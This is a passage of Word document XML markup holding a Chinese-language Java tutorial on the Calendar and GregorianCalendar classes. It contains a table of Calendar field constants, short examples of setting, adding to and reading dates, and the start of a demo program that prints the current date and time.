      </w:r>
    </w:p>
    <w:p w14:paraId="61AFAC26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9925" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4547"/>
        <w:gridCol w:w="5378"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="320CD9C5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2B6C0818" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>常量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6A7F55D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="2F87C633" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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320B2B0A"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lastRenderedPageBreak/>
              <w:t>Calendar.YEAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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717EFB9E"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年份</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="18F92DFC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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06CB584A"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Calendar.MONTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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4206C67B"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月份</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="461A451A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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2A65D319"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Calendar.DATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1F60228D"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日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="64D6A9B9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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78D9D407"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Calendar.DAY_OF_MONTH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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57A80BB9"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日期，和上面的字段意义完全相同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="728E75E8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1A39FF2B"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Calendar.HOUR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3DFEC9BF"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12小时制的小时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="394D1C19" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5E4E3719"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Calendar.HOUR_OF_DAY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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79A4909F"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24小时制的小时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="739CD5EA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5E3BBA21"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Calendar.MINUTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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34607608"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分钟</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0A30F0F7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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62C75702"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Calendar.SECOND</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1461E23D"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秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="759379F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1298ED0E"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Calendar.DAY_OF_WEEK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0FCAE3D7"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星期几</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35BA9774" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525102E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的设置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E90F85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> public final void set(int year,int month,int date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70050C3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB3D02A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calendar c1 = Calendar.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694597B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c1.set(2009, 6, 12);//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Calendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的年月日分别设这为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA8473" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33180D5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">c1.add(Calendar.DATE, 10); // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC57D9B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c1.add(Calendar.DATE, -10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F706E75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Calendar c1 = Calendar.getInstance();// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得年份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A85D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int year = c1.get(Calendar.YEAR);// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得月份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FCCB4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int month = c1.get(Calendar.MONTH) + 1;// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FB558" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int date = c1.get(Calendar.DATE);// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得小时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EACB42D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int hour = c1.get(Calendar.HOUR_OF_DAY);// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得分钟</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42891FED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int minute = c1.get(Calendar.MINUTE);// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219AB16C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int second = c1.get(Calendar.SECOND);// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得星期几（注意（这个与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类是不同的）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表星期日、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表星期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表星期二，以此类推）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46954C68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int day = c1.get(Calendar.DAY_OF_WEEK);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A11941" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GregorianCalendar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现公历日历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752CCE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import java.util.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B57D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B4B29D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class GregorianCalendarDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3934E1AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC20C2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B59F6E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      String months[] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45612274" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      "Jan", "Feb", "Mar", "Apr",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A739AC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      "May", "Jun", "Jul", "Aug",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00058795" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      "Sep", "Oct", "Nov", "Dec"};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F16F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C904E7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      int year;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FA32B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gregorian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C38469" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用当前时间和日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB772E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认为本地时间和时区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D7DAAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GregorianCalendar gcalendar = new GregorianCalendar();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED1D2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示当前时间和日期的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42852AA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print("Date: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C12FD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print(months[gcalendar.get(Calendar.MONTH)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535429C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print(" " + gcalendar.get(Calendar.DATE) + " ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3DB16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.println(year = gcalendar.get(Calendar.YEAR));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088B762" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print("Time: ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EFDCA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print(gcalendar.get(Calendar.HOUR) + ":");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F0D965" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.print(gcalendar.get(Calendar.MINUTE) + ":");</w:t>
      </w:r>
    </w:p>
